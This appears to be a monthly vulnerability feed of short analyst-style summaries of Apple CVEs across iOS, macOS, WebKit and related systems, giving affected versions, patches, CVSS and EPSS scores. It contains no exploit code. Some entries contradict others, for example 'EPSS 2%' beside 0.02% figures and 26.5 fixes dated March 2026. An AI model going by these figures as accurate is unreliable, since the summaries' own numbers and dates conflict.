Apple
Monthly
Sandbox escape vulnerability in Apple operating systems allows malicious apps with low privileges to break out of application sandbox and execute code with elevated privileges on the host system. Affects iOS, iPadOS, macOS, tvOS, visionOS, and watchOS across multiple versions. Apple has released patches for all affected platforms. EPSS score of 0.02% (7th percentile) indicates low probability of mass exploitation in the wild, though the CVSS 8.8 score reflects significant potential impact if successfully weaponized. No active exploitation confirmed at time of analysis.
Type confusion vulnerability in Apple's operating systems allows remote unauthenticated attackers to trigger denial of service across iOS, iPadOS, macOS, tvOS, visionOS, and watchOS. Apple has released patches addressing the issue in iOS/iPadOS 18.7.9 and 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, and watchOS 26.5. The CVSS vector indicates network-accessible exploitation with low complexity and no privileges required, though EPSS score of 0.13% (32nd percentile) suggests relatively low likelihood of widespread exploitation. No public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV.
Process memory corruption in Apple's image processing subsystem across iOS, iPadOS, macOS, tvOS, and visionOS allows remote attackers to extract confidential data from process memory via crafted images. The vulnerability affects all Apple operating systems prior to their respective May 2026 security updates. CVSS vector indicates network-based, unauthenticated exploitation requiring no user interaction beyond processing the image, though the CVSS score focuses on confidentiality impact (C:H) with no integrity or availability impact. EPSS score of 0.02% suggests low observed exploitation likelihood, with no CISA KEV listing or public POC identified at time of analysis. Apple has released patches across all affected platforms.
The issue was addressed with improved input validation. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.
The issue was addressed with improved memory handling. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing an audio stream in a maliciously crafted media file may terminate the process.
The issue was addressed with improved memory handling. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may lead to an unexpected process crash.
Memory corruption in Apple operating systems allows remote attackers to trigger unexpected app termination or corrupt process memory by delivering a maliciously crafted media file to users, requiring user interaction to open the file. Affects iOS/iPadOS 26.4 and earlier, macOS Sequoia 15.7.6 and earlier, macOS Sonoma 14.8.6 and earlier, macOS Tahoe 26.4 and earlier, tvOS 26.4 and earlier, visionOS 26.4 and earlier, and watchOS 26.4 and earlier. No public exploit identified at time of analysis; vendor-released patches are available across all affected platforms.
An issue with app access to camera metadata was addressed with improved logic. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, visionOS 26.5. An app may be able to capture a user's screen.
The issue was addressed with improved checks. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, macOS Sequoia 15.7.7, macOS Tahoe 26.5. Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents.
A use-after-free vulnerability in Apple's Wi-Fi stack allows attackers in a privileged network position to cause denial-of-service via crafted Wi-Fi packets. The vulnerability affects iOS and iPadOS versions prior to 26.5 and 18.7.9, macOS versions prior to 26.5, 15.7.7, and 14.8.7, and tvOS, watchOS versions prior to 26.5. Exploitation requires adjacent network access and specific radio conditions (AC:H) but results in high availability impact with no active public exploitation identified.
Remote attackers can crash Apple devices or corrupt kernel memory without authentication via a use-after-free vulnerability affecting iOS, iPadOS, macOS, tvOS, visionOS, and watchOS. Apple has released patches across eight separate security bulletins (HT127110-127120) fixing this memory management flaw in all supported OS versions. EPSS score of 0.10% (28th percentile) suggests low exploitation probability despite the network-accessible attack vector and lack of authentication requirements. No active exploitation or public POC identified at time of analysis.
macOS Tahoe allows applications to access protected user data due to insufficient permission enforcement on system APIs. The vulnerability affects all macOS versions prior to 26.5 and is tagged as an authentication bypass, indicating apps can circumvent permission prompts or system restrictions to read sensitive data without user consent. While not yet actively exploited (EPSS 0.01%, no CISA KEV listing), the CVSS vector (AV:N/AC:L/PR:N/UI:N) appears inconsistent with the local application context described, suggesting potential network-accessible component or misclassified attack vector requiring vendor clarification.
High confidentiality information disclosure across Apple's ecosystem (iOS, iPadOS, macOS, visionOS) allows remote unauthenticated attackers to extract sensitive data by delivering a maliciously crafted file. The vulnerability affects all current Apple operating systems and was fixed in March 2026 security updates (iOS/iPadOS 18.7.9/26.5, macOS 14.8.7/26.5, visionOS 26.5). Despite CVSS 7.5 HIGH rating and network attack vector requiring no privileges, EPSS exploitation probability is very low at 0.02% (5th percentile), suggesting minimal real-world risk. No active exploitation confirmed (not in CISA KEV) and no public POC identified at time of analysis.
Apps on iOS and iPadOS can bypass App Privacy Report logging due to insufficient entitlement checks, allowing malicious applications to conceal their privacy-invasive activities from users. Fixed in iOS/iPadOS 18.7.9 and 26.4. The CVSS vector (AV:N/AC:L/PR:N/UI:N) appears inconsistent with the actual attack requirements, as exploitation requires a malicious app already installed on the device, not remote network access. Despite the 7.5 CVSS score, EPSS exploitation probability is very low (0.02%, 5th percentile), no active exploitation is confirmed, and no public exploit code identified at time of analysis.
Physical access to a locked macOS Tahoe device prior to version 26.5 allows an attacker to view sensitive user information without authentication. The vulnerability has a low EPSS score (0.02%, 6th percentile) and CISA assesses it as non-exploitable in the wild (SSVC exploitation: none), indicating this is a low-probability real-world threat despite the confidentiality impact rating. The fix is available in macOS Tahoe 26.5.
Improper bounds checking in Apple operating systems allows processing of maliciously crafted files to cause unexpected application termination (denial of service) on iOS, iPadOS, macOS, tvOS, visionOS, and watchOS. The vulnerability affects multiple major OS versions and requires local file processing without user interaction, but has extremely low real-world exploitation probability (EPSS 0.02%) despite moderate CVSS score.
Information leakage in Apple operating systems allows remote attackers to extract sensitive data by crafting and hosting malicious websites that users visit. The vulnerability affects iOS 18.7.8 and earlier, iPadOS 18.7.8 and earlier, macOS Sequoia 15.7.6 and earlier, macOS Sonoma 14.8.6 and earlier, macOS Tahoe 26.4 and earlier, tvOS 26.4 and earlier, visionOS 26.4 and earlier, and watchOS 26.4 and earlier. Exploitation requires user interaction (UI:R) to visit a malicious website but does not require authentication, with an EPSS score of 0.03 percent indicating low real-world exploitation probability despite the information disclosure impact.
Local authenticated apps bypass user consent mechanisms to access sensitive user data across iOS 18.7.8 and earlier, iPadOS 18.7.8 and earlier, macOS Sequoia 15.7.6 and earlier, macOS Sonoma 14.8.6 and earlier, macOS Tahoe 26.4 and earlier, and visionOS 26.4 and earlier. The vulnerability allows malicious or compromised applications running with standard user privileges to exfiltrate protected information without triggering the expected permission prompts. Apple has patched this by implementing an additional consent verification layer, though the low EPSS score (0.02%) suggests real-world exploitation remains limited.
Null pointer dereference in Apple operating systems (iOS, iPadOS, macOS Tahoe, tvOS) allows local network attackers to cause denial of service by sending crafted input that bypasses validation. The vulnerability affects all versions prior to iOS 26.5, iPadOS 26.5, macOS Tahoe 26.5, and tvOS 26.5. No code execution or data compromise is possible; impact is limited to availability disruption on affected devices.
A race condition in Apple operating systems allows authenticated local attackers to access sensitive user data with high complexity exploitation. The vulnerability affects iOS 18.7.9 and earlier, iPadOS 18.7.9 and earlier, iOS 26.5 and earlier, iPadOS 26.5 and earlier, macOS Sequoia 15.7.7 and earlier, macOS Sonoma 14.8.7 and earlier, macOS Tahoe 26.5 and earlier, and visionOS 26.5 and earlier. Vendor-released patches are available, and exploitation requires local access with user-level privileges and high technical complexity. The EPSS score of 0.02% and absence from active exploitation databases indicate low real-world exploitation risk despite the high confidentiality impact.
Buffer overflow in Apple operating systems allows local unauthenticated users to cause unexpected system termination or read kernel memory without requiring user interaction. The vulnerability affects iOS, iPadOS, macOS, tvOS, visionOS, and watchOS across multiple versions, with exploitation limited to local access. Vendor-released patches are available for all affected platforms, and EPSS scoring of 0.03% indicates exploitation remains unlikely despite the local attack vector.
Denial of service in Apple macOS prior to version 26.5 allows remote attackers to crash Safari via maliciously crafted web content that triggers a use-after-free memory condition. The vulnerability requires user interaction (opening a malicious webpage) but no authentication, affecting all macOS versions before 26.5. EPSS exploitation probability is very low at 0.02%, suggesting limited real-world attack incentive despite the crash capability.
Content Security Policy bypass in Apple's WebKit-based platforms (iOS, iPadOS, macOS Tahoe, tvOS, visionOS, watchOS) allows maliciously crafted web content to evade CSP enforcement, undermining a core browser defense against XSS and data exfiltration. Apple addressed the input validation flaw across its product line in coordinated June 2026 updates. No public exploit is identified at time of analysis and EPSS is very low (0.03%), but the cross-platform reach and high CIA impact via user interaction make patching a priority.
Out-of-bounds read in Apple operating systems allows malicious applications to crash the system or leak kernel memory across iOS/iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, and watchOS 26.5. The vulnerability requires local application execution but no user interaction, enabling information disclosure and denial-of-service attacks. Despite high CVSS 7.3 scoring, the EPSS probability is very low (0.02%, 5th percentile), indicating minimal observed exploitation activity. Vendor-released patches are available for all affected platforms.
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.5. An app may be able to execute arbitrary code with kernel privileges.
Kernel memory disclosure vulnerability affects all major Apple operating systems through improper memory handling. Malicious apps can read sensitive kernel memory contents remotely without authentication (CVSS 7.5, AV:N). Apple has released patches across iOS/iPadOS (versions 18.7.9 and 26.5), macOS (Sequoia 15.7.7, Sonoma 14.8.7, Tahoe 26.5), tvOS 26.5, visionOS 26.5, and watchOS 26.5. Despite the network attack vector, EPSS score remains very low at 0.02% (7th percentile), suggesting limited real-world exploitation probability. No active exploitation confirmed (not in CISA KEV), and no public exploit code identified at time of analysis.
Insufficient permission enforcement in macOS Tahoe prior to 26.5 allows applications to bypass access controls and read protected user data without proper authorization. Apple addressed the vulnerability through hardened permission checks in version 26.5. EPSS probability indicates minimal observed exploitation activity (0.01%, 3rd percentile), and no public exploit code or CISA KEV listing exists at time of analysis, suggesting exploitation requires application-specific development effort rather than readily available tooling.
Denial-of-service vulnerability in iOS and iPadOS allows network-positioned attackers with high privileges to crash or degrade service availability through insufficient input validation. Apple addressed this with patches in iOS 18.7.7, iPadOS 18.7.7, iOS 26.4, and iPadOS 26.4. EPSS score of 0.02% (5th percentile) indicates very low real-world exploitation probability despite CVSS score of 4.9.
Privacy bypass in Apple operating systems allows local authenticated apps to circumvent user-configured privacy restrictions through permission mishandling. The vulnerability affects iOS, iPadOS, macOS Tahoe, visionOS, and watchOS versions prior to 26.5. An attacker with local app execution privileges can access sensitive data classified as restricted by user privacy settings, though without authentication bypass or integrity compromise. Fixed in coordinated OS updates across Apple's ecosystem.
The issue was addressed with improved UI handling. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, visionOS 26.5. A malicious iframe may use another website’s download settings.
An authorization issue was addressed with improved state management. This issue is fixed in macOS Tahoe 26.4. An app may be able to access sensitive user data.
Privilege escalation in Apple operating systems allows local authenticated applications to gain root privileges through an authorization flaw in state management. Affects multiple macOS versions (Sonoma, Sequoia, Tahoe) and iOS/iPadOS versions prior to patched releases. Apple has issued coordinated security updates across all affected platforms (iOS 18.7.9/26.5, iPadOS 18.7.9/26.5, macOS Sonoma 14.8.7, Sequoia 15.7.7, Tahoe 26.5). EPSS score of 0.02% (5th percentile) indicates low probability of widespread exploitation despite high CVSS 7.8, with no public exploit identified at time of analysis and no CISA KEV listing. The local attack vector requiring authenticated privileges substantially reduces immediate risk compared to network-based vulnerabilities.
IP address tracking across iOS, iPadOS, macOS, and visionOS allows remote attackers to correlate user activity without authentication due to improper state management (CWE-359: Exposure of Private Personal Information). The vulnerability affects default configurations across six Apple OS versions with network-accessible attack vector and low complexity. EPSS score of 0.02% (7th percentile) indicates minimal observed exploitation activity. Apple released coordinated patches across all affected platforms in March 2026 security updates.
Improper permissions checking in macOS before version 26.4 allows a malicious app with local user privileges to access arbitrary files without user interaction, potentially exposing sensitive data. The vulnerability has a low EPSS score (0.01%) and no confirmed active exploitation, making it a low-priority but real local privilege escalation risk for systems where untrusted applications may execute.
Use-after-free in WebKit allows remote attackers to trigger Safari crashes and potentially achieve arbitrary code execution across Apple's entire ecosystem (iOS, iPadOS, macOS, tvOS, visionOS, watchOS) via maliciously crafted web content. Users must visit or be tricked into visiting a malicious webpage (UI:R). Despite CVSS 8.8 (High) with theoretical code execution impact (C:H/I:H/A:H), EPSS probability is extremely low (0.02%, 5th percentile), indicating minimal observed exploitation activity. No public exploit identified at time of analysis, and vendor patches are available across all platforms as of version 26.5.
Memory corruption in Safari's WebKit engine across all Apple platforms allows remote attackers to trigger information disclosure via maliciously crafted web content delivered through network-accessible attack vectors requiring no authentication or user interaction. Despite the vendor description focusing on crash scenarios, the CVSS vector (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) indicates high confidentiality impact with no availability impact, suggesting potential memory disclosure rather than denial of service. Patched in iOS/iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, and watchOS 26.5. EPSS score of 0.02% (5th percentile) suggests low probability of mass exploitation despite network-accessible attack vector.
Memory corruption in Apple operating systems due to a race condition in locking mechanisms allows local authenticated attackers to cause unexpected app termination or potential denial of service. The vulnerability affects iOS 18.7.8 and earlier, iPadOS 18.7.8 and earlier, macOS Sequoia 15.7.6 and earlier, macOS Sonoma 14.8.6 and earlier, macOS Tahoe 26.4 and earlier, tvOS 26.4 and earlier, visionOS 26.4 and earlier, and watchOS 26.4 and earlier. Vendor-released patches are available across all affected platforms, with no public exploit identified at time of analysis.
Integer overflow in Apple operating systems allows remote unauthenticated attackers to crash devices via maliciously crafted input, causing denial of service through system termination. Affects iOS/iPadOS versions prior to 18.7.9, macOS Sequoia prior to 15.7.7, macOS Sonoma prior to 14.8.7, and macOS Tahoe prior to 26.5. Apple has released patches for all affected platforms. Despite the network attack vector and lack of authentication requirements (CVSS AV:N/PR:N), EPSS exploitation probability is very low at 0.02% (5th percentile), and no public exploits or active exploitation have been identified. Not listed in CISA KEV, suggesting limited real-world targeting.
Memory corruption in WebKit across Apple platforms (iOS, iPadOS, macOS, tvOS, visionOS) allows remote attackers to access sensitive information via malicious web content. CVSS vector indicates network-based exploitation requiring no user interaction or authentication (AV:N/AC:L/PR:N/UI:N), contradicting the description's 'process crash' outcome with the High Confidentiality impact rating. EPSS score of 0.02% (5th percentile) suggests low real-world exploitation probability. Vendor patches available for all affected platforms (version 26.5). SSVC framework rates this as automatable with partial technical impact but no observed exploitation.
Local privilege escalation in macOS allows authenticated users with low-level access to gain root privileges through a permissions enforcement flaw. Affects macOS Tahoe (pre-26.4), Sequoia (pre-15.7.7), and Sonoma (pre-14.8.7). Apple has released patches for all affected versions. Despite CVSS 7.8, EPSS score of 0.01% indicates minimal observed exploitation activity. No public exploit code identified at time of analysis, though the local attack vector and low complexity suggest post-compromise utility rather than initial access vector.
Buffer overflow in Apple's image processing framework across iOS, iPadOS, macOS, tvOS, and watchOS allows remote attackers to cause denial of service through process memory corruption. Despite the CVSS 7.5 (High) rating and network attack vector, the vulnerability is rated low priority with only 2% EPSS exploitation probability (5th percentile), indicating minimal real-world threat activity. Apple has released patches in version 26.5 across all affected platforms. No active exploitation or public proof-of-concept has been identified at time of analysis.
WebKit memory corruption vulnerability allows remote attackers to trigger denial-of-service process crashes across Apple's entire operating system ecosystem (iOS, iPadOS, macOS, tvOS, watchOS) when processing maliciously crafted web content. Despite a CVSS score of 7.5 suggesting high confidentiality impact, the vendor description indicates only process crash (availability impact), representing a scoring discrepancy that requires clarification. No active exploitation confirmed (not in CISA KEV), EPSS score of 0.02% (5th percentile) indicates low observed exploitation probability, and vendor patches released across all affected platforms in version 26.5.
Remote denial of service in Apple WebKit (iOS/iPadOS 26.5, macOS Tahoe 26.5, visionOS 26.5) allows unauthenticated network attackers to crash browser processes via maliciously crafted web content exploiting a memory handling flaw. CVSS 7.5 (High) reflects network-based attack with no authentication required, though impact is limited to availability (process crash). EPSS score of 0.02% (4th percentile) indicates very low observed exploitation probability. SSVC assessment confirms no active exploitation, but marks it as automatable, suggesting potential for future weaponization in drive-by attacks. Apple has released patches across all affected platforms.
Improper log data redaction across Apple's operating systems exposes sensitive kernel state to locally-installed applications. Vulnerable versions include iOS/iPadOS prior to 18.7.9 and 26.5, macOS Sequoia prior to 15.7.7, macOS Sonoma prior to 14.8.7, macOS Tahoe prior to 26.5, tvOS prior to 26.5, and watchOS prior to 26.5. Apple has released patches for all affected platforms addressing the CWE-532 (insertion of sensitive information into log file) weakness. The CVSS vector (AV:N/AC:L/PR:N/UI:N) appears inconsistent with the description of an app-based exploit, suggesting Apple's logging subsystem may be remotely queryable or the vector requires clarification. EPSS score of 0.02% (7th percentile) indicates minimal observed exploitation activity despite the high CVSS rating.
Out-of-bounds read in Apple operating systems allows remote unauthenticated denial-of-service via malicious application. Apple has patched this vulnerability across all affected platforms (iOS/iPadOS, macOS, tvOS, visionOS, watchOS) in version 26.5 releases. Despite CVSS 7.5 HIGH rating, exploitation probability remains low (EPSS 2%, 5th percentile) with no public exploit code identified and no CISA KEV listing. The vulnerability is impact-limited to availability (denial-of-service) with no confidentiality or integrity compromise, though tags indicate potential information disclosure concerns that warrant verification against vendor advisories.
Apple Mail on iOS, iPadOS, and macOS bypasses Lockdown Mode protections when replying to emails, allowing remote image loading that should be blocked. This information disclosure affects all supported Apple OS versions (iOS/iPadOS 18.x, macOS Sequoia 15.x, Sonoma 14.x, and Tahoe 26.x) prior to security updates released in early 2026. The vulnerability undermines a critical privacy protection for high-risk users, enabling email tracking and potential IP address disclosure despite Lockdown Mode activation. EPSS score of 0.02% suggests minimal automated exploitation likelihood, no public exploit or CISA KEV listing identified, though the attack complexity is rated low (CVSS AC:L).
Use-after-free in WebKit across Apple's entire operating system ecosystem enables remote information disclosure via malicious web content. Affects iOS/iPadOS, macOS Tahoe, tvOS, visionOS, and watchOS versions prior to 26.5. The vulnerability allows network-based unauthenticated attackers to access high-value confidential information through crafted web pages, though the CVE description anomalously mentions process crash (availability impact) while the CVSS vector indicates confidentiality impact only. No public exploit identified at time of analysis. EPSS score of 0.02% (5th percentile) suggests low likelihood of imminent widespread exploitation despite the broad platform impact and network attack vector.
Malicious applications on iOS 26.5, iPadOS 26.5, and visionOS 26.5 can access sensitive user data due to inconsistent user interface state management. The vulnerability stems from UI state handling flaws (CWE-451) that allow apps to bypass expected data access controls. Apple has released patches in iOS/iPadOS 26.5 and visionOS 26.5. Despite a CVSS score of 7.5 (High), the EPSS score of 0.02% (5th percentile) indicates minimal observed exploitation probability in the wild. No public exploit code or CISA KEV listing identified at time of analysis, suggesting this is primarily a platform-hardening fix rather than an actively targeted vulnerability.
Out-of-bounds write in Apple operating systems allows network-based unauthenticated attackers to corrupt kernel memory or cause denial of service without user interaction. The vulnerability affects iOS, iPadOS, macOS, tvOS, visionOS, and watchOS across multiple versions. Apple has released patches for all affected platforms, though the extremely low EPSS score (0.02%) suggests real-world exploitation risk is minimal despite the network attack vector.
Local attackers can modify Apple Keychain state across iOS, iPadOS, macOS, tvOS, visionOS, and watchOS due to improper input validation (CWE-20). This affects all Apple operating systems prior to their respective April 2026 security updates. Despite a CVSS score of 7.5, exploitation requires local access with specific privileges (description states 'local attacker'), contradicting the CVSS vector's AV:N/PR:N rating. EPSS score of 0.02% (7th percentile) indicates very low observed exploitation probability. No public exploit identified at time of analysis and not listed in CISA KEV. Vendor-released patches available across all platforms as of April 2026.
Buffer overflow in macOS kernel allows local applications to terminate the system or write to kernel memory, affecting macOS Sequoia 15.x, Sonoma 14.x, and Tahoe 26.x. Apple has released security updates patching this vulnerability. Despite the CVSS vector indicating network-based attack (AV:N), the description specifies 'an app may be able to' which confirms local application context, indicating a vector/description inconsistency. EPSS score of 0.02% (4th percentile) suggests low probability of mass exploitation, and no active exploitation or public POC identified at time of analysis.
Malicious applications on macOS Sequoia, Sonoma, and Tahoe can bypass user consent prompts to access the Contacts database through a race condition in symbolic link handling. Apple has patched this privacy control bypass in macOS Sequoia 15.7.7, Sonoma 14.8.7, and Tahoe 26.5. Despite a network-based CVSS vector scoring 7.5 (High), the actual attack requires local application execution, indicating likely miscategorization in the metric. EPSS exploitation probability is very low (0.02%, 4th percentile) with no active exploitation or public POC identified at time of analysis.
Lock screen bypass in iOS and iPadOS versions prior to 26.5 allows unauthorized access to restricted content without authentication. Apple's security advisory HT227110 confirms the privacy issue affected lock screen content filtering mechanisms. Despite CVSS 7.5 scoring suggesting network exploitation, the vulnerability requires physical access to a locked device, creating a significant disparity between theoretical severity and practical attack surface. EPSS probability of 0.02% (5th percentile) indicates minimal observed exploitation attempts, and no CISA KEV listing or public exploit code exists at time of analysis.
Out-of-bounds write in Apple's file parsing component across iOS, iPadOS, and macOS enables remote code execution or denial of service via maliciously crafted files with no user interaction required. Exploitation probability is extremely low (EPSS 0.02%, 6th percentile) with no public exploit identified at time of analysis, despite the critical CVSS 7.3 score and network-based attack vector. Vendor patches available for all affected platforms (iOS/iPadOS 18.7.9, 26.5; macOS Sonoma 14.8.7, Sequoia 15.7.7, Tahoe 26.5). The CVSS vector indicating AV:N/PR:N/UI:N suggests automatic exploitation without user interaction, which contradicts the description's 'parsing a file' language - verify whether this requires user action to open/download the file or if background processes parse untrusted files automatically.
Local privilege escalation in macOS allows malicious applications to modify protected filesystem areas despite system integrity protections, enabling persistent compromise of system security. Affects macOS Sequoia (prior to 15.7.7), Sonoma (prior to 14.8.7), and Tahoe (prior to 26.5). Apple fixed the vulnerability by removing the exploitable code component. Despite the CVSS vector indicating a network-based denial-of-service, the description clearly states the actual impact is unauthorized filesystem modification by local applications, suggesting a CVSS scoring inconsistency. EPSS exploitation probability is very low (0.02%, 4th percentile) with no public exploit code or CISA KEV listing identified.
Memory corruption in Apple's image processing subsystem allows remote unauthenticated attackers to read sensitive process memory across all major Apple platforms (iOS, macOS, tvOS, visionOS, watchOS). CVSS 7.5 indicates network-exploitable, no-interaction attack surface, yet EPSS score of 0.02% (7th percentile) suggests low observed exploitation activity. Vendor-released patches available for all affected platforms as of March 2026. No active exploitation confirmed (not in CISA KEV), but the network attack vector and broad platform impact warrant priority patching for Apple ecosystem deployments.
A race condition in Apple operating systems allows unauthenticated remote attackers to cause system-wide denial of service through unexpected system termination. The vulnerability affects iOS/iPadOS, macOS (Sequoia, Sonoma, Tahoe), tvOS, and watchOS across multiple version branches. Apple has released patches for all affected platforms. The CVSS 7.5 score reflects high availability impact with network attack vector and low complexity, though EPSS probability remains very low (0.02%, 7th percentile), suggesting limited real-world exploitation likelihood. No active exploitation confirmed (not listed in CISA KEV), and no public proof-of-concept identified at time of analysis.
Use-after-free memory corruption in Apple operating systems allows high confidentiality impact through unexpected system termination. Affects iOS/iPadOS versions before 18.7.9 and 26.5, macOS Sequoia before 15.7.7, macOS Sonoma before 14.8.7, macOS Tahoe before 26.5, tvOS before 26.5, visionOS before 26.5, and watchOS before 26.5. Vendor-released patches are available across all affected platforms. EPSS score of 0.02% (7th percentile) indicates low observed exploitation probability in the wild, and no public exploit identified at time of analysis. CVSS vector indicates network-reachable attack surface with no authentication required, though the description states only 'an app' can trigger the condition, suggesting conflicting attack vector classification.
Content Security Policy bypass in Apple WebKit allows remote attackers to access sensitive information via maliciously crafted web content. Affects all major Apple platforms (iOS/iPadOS, macOS, tvOS, visionOS, watchOS) prior to their respective 26.5 releases (iOS/iPadOS also fixed in 18.7.9). Vendor-released patches available across all platforms. EPSS score of 0.03% (10th percentile) indicates low observed exploitation probability despite network-accessible attack vector requiring no authentication or user interaction. No public exploit code or CISA KEV listing identified at time of analysis.
Memory corruption in WebKit across Apple's ecosystem enables confidentiality breach via malicious web content without user interaction. Affects iOS/iPadOS versions prior to 18.7.9 and 26.5, macOS Tahoe prior to 26.5, and all Apple operating systems (tvOS, visionOS, watchOS) prior to 26.5. Despite CVSS 7.5 (High), the EPSS score of 0.03% (10th percentile) indicates minimal real-world exploitation likelihood at time of analysis. No active exploitation confirmed (not in CISA KEV), and no public exploit code identified. Apple has released patches across all affected platforms.
Information disclosure in Apple WebKit's web content processing engine allows remote attackers to read sensitive memory contents via maliciously crafted web pages. This buffer overflow vulnerability (CWE-119) affects all major Apple platforms including iOS, iPadOS, macOS, tvOS, visionOS, and watchOS prior to their respective patched versions. The CVSS vector AV:N/AC:L/PR:N/UI:N indicates trivial network-based exploitation requiring no authentication or user interaction, though the impact is limited to confidentiality (C:H/I:N/A:N) rather than the process crash described by Apple. EPSS score of 0.03% (10th percentile) suggests low observed exploitation probability despite the ease of exploitation. No CISA KEV listing or public POC identified at time of analysis. Apple has released patches across all affected platforms.
Apple operating systems prior to version 26.5 allow installed applications to access sensitive user data through an information disclosure vulnerability requiring local access and user interaction. The flaw affects iOS, iPadOS, macOS Tahoe, and visionOS across all versions before 26.5, with an EPSS score of 0.02% indicating low real-world exploitation probability despite the local attack vector and high confidentiality impact.
Information disclosure in macOS allows malicious applications to read unprotected user data through a path handling vulnerability. Affects macOS Sequoia (prior to 15.7.7), Sonoma (prior to 14.8.7), and Tahoe (prior to 26.5). The CVSS vector (AV:N/AC:L/PR:N/UI:N) appears misaligned with the vendor description indicating local app-based exploitation, requiring verification. Despite high CVSS 7.5, EPSS of 0.02% (4th percentile) suggests minimal observed exploitation activity. No public exploit code or CISA KEV listing identified at time of analysis.
Local privilege escalation in macOS Sequoia, Sonoma, and Tahoe allows applications to gain root privileges through a state handling flaw in the operating system. Apple patched this consistency issue in macOS Sequoia 15.7.7, Sonoma 14.8.7, and Tahoe 26.5. Despite the high CVSS score (7.8), EPSS indicates only 0.02% exploitation probability (4th percentile), no public exploit code identified at time of analysis, and no CISA KEV listing, suggesting this is not yet widely exploited but represents a significant risk in multi-user or untrusted application environments.
Information disclosure in Apple WebKit allows remote attackers to extract sensitive user data by serving maliciously crafted web content to Safari or in-app browsers across iOS, iPadOS, macOS, and visionOS. Fixed in iOS/iPadOS 18.7.9, iOS/iPadOS 26.5, macOS Tahoe 26.5, and visionOS 26.5. Despite high CVSS 7.5, EPSS score of 0.02% (5th percentile) indicates minimal observed exploitation attempts in the wild. No CISA KEV listing and no public exploit code identified at time of analysis. Apple characterizes this as an access restriction flaw (CWE-200), suggesting the vulnerability bypasses same-origin policy or other browser security boundaries to leak data cross-domain.
Confidentiality breach in Apple's operating systems (iOS, iPadOS, macOS, tvOS, visionOS, watchOS) allows remote unauthenticated attackers to access high-sensitivity information through improper access control checks. Despite the vendor description indicating denial-of-service impact, the CVSS vector reveals a severe confidentiality compromise (C:H) with network-accessible attack surface requiring no authentication. Apple has patched all affected platforms in coordinated security updates released across six operating systems. EPSS score of 0.02% suggests low observed exploitation probability, and no public exploit code has been identified at time of analysis.
Sandbox escape in macOS logging subsystem allows malicious applications with low privileges to break containment and access system resources beyond sandbox boundaries. The vulnerability stems from improper data redaction in logging mechanisms (CWE-532), affecting macOS Tahoe 26.x, Sequoia 15.x, and Sonoma 14.x prior to their May 2026 updates. Apple has released patches for all affected versions. EPSS score of 0.02% (4th percentile) indicates minimal widespread exploitation likelihood, with no confirmed active exploitation or public POC at time of analysis. CVSS 8.8 HIGH reflects the scope change (S:C) allowing escape from sandboxed context to system-level access with complete confidentiality, integrity, and availability impact.
macOS Gatekeeper can be bypassed using specially crafted disk images, allowing unauthenticated remote attackers to execute untrusted code without security warnings across iOS, iPadOS, and all supported macOS versions. Apple has released patches addressing this authentication bypass in macOS Tahoe 26.5, Sequoia 15.7.7, Sonoma 14.8.7, iOS 18.7.9, and iPadOS 18.7.9. Despite the CVSS 7.5 HIGH rating, EPSS probability remains very low at 0.02% (5th percentile), suggesting limited immediate exploitation risk, though the attack requires no special conditions and could be delivered via common distribution channels like email or web downloads.
Memory corruption in Apple's WebKit web content processing engine causes an unexpected process crash (denial-of-service) across iOS, iPadOS, macOS, tvOS, visionOS, and watchOS when a victim processes attacker-controlled web content. The CVSS vector AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H confirms network-reachable, unauthenticated exploitation limited to availability impact within the affected process - no code execution or data exfiltration is indicated. No public exploit code has been identified at time of analysis, and EPSS scoring at 0.03% (10th percentile) combined with SSVC Exploitation status of 'none' signal low current exploitation pressure.
Buffer overflow in Apple operating systems allows remote attackers to trigger application denial of service without authentication. Affects iOS/iPadOS, macOS (Sequoia, Sonoma, Tahoe), tvOS, visionOS, and watchOS across multiple versions. Vendor-released patches available for all affected platforms. No public exploit identified at time of analysis, with EPSS score of 0.12% (30th percentile) indicating low probability of widespread exploitation attempts. CVSS 7.5 reflects network-accessible unauthenticated attack causing high availability impact but limited to app termination rather than system-wide denial of service.
Local privilege escalation in Apple macOS (Sequoia, Sonoma, and Tahoe branches) allows a malicious application to gain root privileges by exploiting a path validation flaw in directory path handling. The issue, tracked as CVE-2026-28915 and reported by Apple itself, has no public exploit identified at time of analysis and a very low EPSS score (0.02%), but the total technical impact (root) makes it a meaningful endpoint hardening priority.
Safari on Apple platforms crashes when processing maliciously crafted web content due to a use-after-free vulnerability in memory management, resulting in denial of service. Affects iOS and iPadOS below 26.5, macOS Tahoe below 26.5, tvOS below 26.5, visionOS below 26.5, and watchOS below 26.5. Exploitation requires user interaction to visit a malicious webpage but does not allow code execution or information disclosure.
Sandbox escape in macOS Sequoia, Sonoma, and Tahoe allows malicious applications with low privileges to break containment and gain elevated system access. Apple fixed this permissions handling flaw in macOS 15.7.7, 14.8.7, and 26.5 after addressing inadequate sandbox restrictions. No active exploitation confirmed (CISA KEV absent), but the CVSS scope change (S:C) indicates complete sandbox bypass with high impact to confidentiality, integrity, and availability. EPSS score of 0.01% suggests low probability of mass exploitation despite the severity, likely due to the requirement for local app installation and low-privilege authenticated access.
